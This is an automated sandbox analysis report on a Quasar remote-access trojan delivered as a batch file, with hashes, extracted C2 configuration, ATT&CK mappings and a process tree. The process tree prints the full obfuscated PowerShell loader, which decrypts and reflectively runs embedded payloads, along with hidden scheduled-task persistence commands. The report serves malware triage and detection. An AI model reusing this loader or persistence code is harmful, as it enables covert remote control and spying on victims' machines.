quasar | f86ebcd90755fdc28403d64a74ecb638fcae11d51888acca92975cc72902e2d5

General

Target

jstr-built.bat
Size

1.8MB
MD5

6152646d22fa2dfddf47c46a854a04bb
SHA1

b0741da3d0cb9d00bc583e5acc11db419fd1de61
SHA256

f86ebcd90755fdc28403d64a74ecb638fcae11d51888acca92975cc72902e2d5
SHA512

9542dc77487b0abf82bbeff4fd09c35958344855c7825a4b2ce2ee6bd887eb584b7e1c6ea900b1210b130dd70184d5ca66f7a2de7e9e90ef85c403261841840c
SSDEEP

49152:lb7smSSlM/MByDVR/aFPxB0snxHsgfM+DLHeD:2

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Slave

C2

127.0.0.1:80

0.tcp.ngrok.io :19607

Mutex

569bd8bb-286e-475a-a912-45ea94f9c8b7

Attributes

encryption_key
1AF7C677BDE3B8255A8F16FC1CA9D8C708B5355F
install_name
system32 QC.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Update
subdirectory
Windows QC

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1780-120-0x0000018B71CE0000-0x0000018B72004000-memory.dmp	family_quasar

Executes dropped EXE 1 IoCs

Processes:

system32 QC.exe

pid process

3956 system32 QC.exe

pid	process
3956	system32 QC.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\system32\Windows QC\system32 QC.exe	powershell.exe
File opened for modification	C:\Windows\system32\Windows QC\system32 QC.exe	powershell.exe
File opened for modification	C:\Windows\system32\Windows QC	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1960 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings powershell.exe
Runs net.exe

pid	process
1960	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exesystem32 QC.exe

pid	process
1920	powershell.exe
1920	powershell.exe
1920	powershell.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe
3956	system32 QC.exe
3956	system32 QC.exe
3956	system32 QC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeIncreaseQuotaPrivilege	216	powershell.exe
Token: SeSecurityPrivilege	216	powershell.exe
Token: SeTakeOwnershipPrivilege	216	powershell.exe
Token: SeLoadDriverPrivilege	216	powershell.exe
Token: SeSystemProfilePrivilege	216	powershell.exe
Token: SeSystemtimePrivilege	216	powershell.exe
Token: SeProfSingleProcessPrivilege	216	powershell.exe
Token: SeIncBasePriorityPrivilege	216	powershell.exe
Token: SeCreatePagefilePrivilege	216	powershell.exe
Token: SeBackupPrivilege	216	powershell.exe
Token: SeRestorePrivilege	216	powershell.exe
Token: SeShutdownPrivilege	216	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeSystemEnvironmentPrivilege	216	powershell.exe
Token: SeRemoteShutdownPrivilege	216	powershell.exe
Token: SeUndockPrivilege	216	powershell.exe
Token: SeManageVolumePrivilege	216	powershell.exe
Token: 33	216	powershell.exe
Token: 34	216	powershell.exe
Token: 35	216	powershell.exe
Token: 36	216	powershell.exe
Token: SeIncreaseQuotaPrivilege	216	powershell.exe
Token: SeSecurityPrivilege	216	powershell.exe
Token: SeTakeOwnershipPrivilege	216	powershell.exe
Token: SeLoadDriverPrivilege	216	powershell.exe
Token: SeSystemProfilePrivilege	216	powershell.exe
Token: SeSystemtimePrivilege	216	powershell.exe
Token: SeProfSingleProcessPrivilege	216	powershell.exe
Token: SeIncBasePriorityPrivilege	216	powershell.exe
Token: SeCreatePagefilePrivilege	216	powershell.exe
Token: SeBackupPrivilege	216	powershell.exe
Token: SeRestorePrivilege	216	powershell.exe
Token: SeShutdownPrivilege	216	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeSystemEnvironmentPrivilege	216	powershell.exe
Token: SeRemoteShutdownPrivilege	216	powershell.exe
Token: SeUndockPrivilege	216	powershell.exe
Token: SeManageVolumePrivilege	216	powershell.exe
Token: 33	216	powershell.exe
Token: 34	216	powershell.exe
Token: 35	216	powershell.exe
Token: 36	216	powershell.exe
Token: SeIncreaseQuotaPrivilege	216	powershell.exe
Token: SeSecurityPrivilege	216	powershell.exe
Token: SeTakeOwnershipPrivilege	216	powershell.exe
Token: SeLoadDriverPrivilege	216	powershell.exe
Token: SeSystemProfilePrivilege	216	powershell.exe
Token: SeSystemtimePrivilege	216	powershell.exe
Token: SeProfSingleProcessPrivilege	216	powershell.exe
Token: SeIncBasePriorityPrivilege	216	powershell.exe
Token: SeCreatePagefilePrivilege	216	powershell.exe
Token: SeBackupPrivilege	216	powershell.exe
Token: SeRestorePrivilege	216	powershell.exe
Token: SeShutdownPrivilege	216	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeSystemEnvironmentPrivilege	216	powershell.exe
Token: SeRemoteShutdownPrivilege	216	powershell.exe
Token: SeUndockPrivilege	216	powershell.exe
Token: SeManageVolumePrivilege	216	powershell.exe
Token: 33	216	powershell.exe
Token: 34	216	powershell.exe
Token: 35	216	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exe

description	pid	process	target process
PID 4196 wrote to memory of 344	4196	cmd.exe	net.exe
PID 4196 wrote to memory of 344	4196	cmd.exe	net.exe
PID 344 wrote to memory of 212	344	net.exe	net1.exe
PID 344 wrote to memory of 212	344	net.exe	net1.exe
PID 4196 wrote to memory of 1920	4196	cmd.exe	powershell.exe
PID 4196 wrote to memory of 1920	4196	cmd.exe	powershell.exe
PID 1920 wrote to memory of 216	1920	powershell.exe	powershell.exe
PID 1920 wrote to memory of 216	1920	powershell.exe	powershell.exe
PID 1920 wrote to memory of 5016	1920	powershell.exe	WScript.exe
PID 1920 wrote to memory of 5016	1920	powershell.exe	WScript.exe
PID 5016 wrote to memory of 2756	5016	WScript.exe	cmd.exe
PID 5016 wrote to memory of 2756	5016	WScript.exe	cmd.exe
PID 2756 wrote to memory of 1900	2756	cmd.exe	net.exe
PID 2756 wrote to memory of 1900	2756	cmd.exe	net.exe
PID 1900 wrote to memory of 4944	1900	net.exe	net1.exe
PID 1900 wrote to memory of 4944	1900	net.exe	net1.exe
PID 2756 wrote to memory of 1780	2756	cmd.exe	powershell.exe
PID 2756 wrote to memory of 1780	2756	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1960	1780	powershell.exe	schtasks.exe
PID 1780 wrote to memory of 1960	1780	powershell.exe	schtasks.exe
PID 1780 wrote to memory of 3956	1780	powershell.exe	system32 QC.exe
PID 1780 wrote to memory of 3956	1780	powershell.exe	system32 QC.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\jstr-built.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4196

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVUJVzJeFce7f5XhgQpfXWd8gtkJokjuZazm1CcEb0E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2pnv0SMUS2wyUdXSxBRIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LgLaU=New-Object System.IO.MemoryStream(,$param_var); $BFpyT=New-Object System.IO.MemoryStream; $WHHER=New-Object System.IO.Compression.GZipStream($LgLaU, [IO.Compression.CompressionMode]::Decompress); $WHHER.CopyTo($BFpyT); $WHHER.Dispose(); $LgLaU.Dispose(); $BFpyT.Dispose(); $BFpyT.ToArray();}function execute_function($param_var,$param2_var){ $WpAgz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iQVMR=$WpAgz.EntryPoint; $iQVMR.Invoke($null, $param2_var);}$Aneil = 'C:\Users\Admin\AppData\Local\Temp\jstr-built.bat';$host.UI.RawUI.WindowTitle = $Aneil;$ltaKo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Aneil).Split([Environment]::NewLine);foreach ($iIzJm in $ltaKo) { if ($iIzJm.StartsWith(':: ')) { $egjDd=$iIzJm.Substring(3); break; }}$payloads_var=[string[]]$egjDd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_107_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_107.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_107.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_107.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\system32\net.exe
net file
5⤵
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
6⤵
PID:4944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVUJVzJeFce7f5XhgQpfXWd8gtkJokjuZazm1CcEb0E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2pnv0SMUS2wyUdXSxBRIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LgLaU=New-Object System.IO.MemoryStream(,$param_var); $BFpyT=New-Object System.IO.MemoryStream; $WHHER=New-Object System.IO.Compression.GZipStream($LgLaU, [IO.Compression.CompressionMode]::Decompress); $WHHER.CopyTo($BFpyT); $WHHER.Dispose(); $LgLaU.Dispose(); $BFpyT.Dispose(); $BFpyT.ToArray();}function execute_function($param_var,$param2_var){ $WpAgz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iQVMR=$WpAgz.EntryPoint; $iQVMR.Invoke($null, $param2_var);}$Aneil = 'C:\Users\Admin\AppData\Roaming\startup_str_107.bat';$host.UI.RawUI.WindowTitle = $Aneil;$ltaKo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Aneil).Split([Environment]::NewLine);foreach ($iIzJm in $ltaKo) { if ($iIzJm.StartsWith(':: ')) { $egjDd=$iIzJm.Substring(3); break; }}$payloads_var=[string[]]$egjDd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\system32\Windows QC\system32 QC.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1960

C:\Windows\system32\Windows QC\system32 QC.exe
"C:\Windows\system32\Windows QC\system32 QC.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3956

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7c063219527a7709eacae3b97197e0ff

SHA1
aec6bb765534427b6564f486fb62651076a36f80

SHA256
96dfc43d1b2be59f2ba61ec20ca12f9c17f57fe6c4e919883a10387f1065d571

SHA512
35580b9f2ee14c2f08762c3f1bf41ceafe1bb20498cc0b8fe74e9f7d6ff81e17f252810764d0ac85f4647b3995c5d5b93351c98bad4921e60c90877c7ea6bb8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kb3seeto.pvi.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_107.bat
Filesize
1.8MB

MD5
6152646d22fa2dfddf47c46a854a04bb

SHA1
b0741da3d0cb9d00bc583e5acc11db419fd1de61

SHA256
f86ebcd90755fdc28403d64a74ecb638fcae11d51888acca92975cc72902e2d5

SHA512
9542dc77487b0abf82bbeff4fd09c35958344855c7825a4b2ce2ee6bd887eb584b7e1c6ea900b1210b130dd70184d5ca66f7a2de7e9e90ef85c403261841840c

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_107.vbs
Filesize
115B

MD5
4851185e2828ac223a0da8f32527c000

SHA1
72f4de01db8b447b4541b21b51f48875fa4112f6

SHA256
17ff718e490d784eca93233f4586e6ab60046fd767533b36c34e49de75be9d3a

SHA512
ba7e2f797f30715185b0d1fdc6c3a97b3fca415a679a4188c186ae03c43196852bd6d8f619b8b1223e52196539ca979bf27ca574969a2dfe51bdd32cf3d3782a

Download Submit
C:\Windows\System32\Windows QC\system32 QC.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/216-43-0x00000263F7CF0000-0x00000263F7D00000-memory.dmp

Filesize
64KB

Download
memory/216-76-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/216-58-0x00000263F7CF0000-0x00000263F7D00000-memory.dmp

Filesize
64KB

Download
memory/216-41-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/216-42-0x00000263F7CF0000-0x00000263F7D00000-memory.dmp

Filesize
64KB

Download
memory/1780-111-0x0000018B71700000-0x0000018B71710000-memory.dmp

Filesize
64KB

Download
memory/1780-92-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/1780-176-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/1780-120-0x0000018B71CE0000-0x0000018B72004000-memory.dmp

Filesize
3.1MB

Download
memory/1780-95-0x0000018B71700000-0x0000018B71710000-memory.dmp

Filesize
64KB

Download
memory/1780-94-0x0000018B71700000-0x0000018B71710000-memory.dmp

Filesize
64KB

Download
memory/1920-9-0x00000271332D0000-0x00000271332E0000-memory.dmp

Filesize
64KB

Download
memory/1920-7-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/1920-29-0x0000027133810000-0x0000027133968000-memory.dmp

Filesize
1.3MB

Download
memory/1920-12-0x00000271334A0000-0x0000027133516000-memory.dmp

Filesize
472KB

Download
memory/1920-4-0x00000271333F0000-0x0000027133412000-memory.dmp

Filesize
136KB

Download
memory/1920-117-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/1920-23-0x00000271332D0000-0x00000271332E0000-memory.dmp

Filesize
64KB

Download
memory/1920-8-0x00000271332D0000-0x00000271332E0000-memory.dmp

Filesize
64KB

Download
memory/1920-28-0x0000027133490000-0x0000027133498000-memory.dmp

Filesize
32KB

Download
memory/3956-133-0x0000021475C40000-0x0000021475C50000-memory.dmp

Filesize
64KB

Download
memory/3956-132-0x0000021475C40000-0x0000021475C50000-memory.dmp

Filesize
64KB

Download
memory/3956-160-0x0000021475EA0000-0x0000021475EDC000-memory.dmp

Filesize
240KB

Download
memory/3956-130-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download
memory/3956-178-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads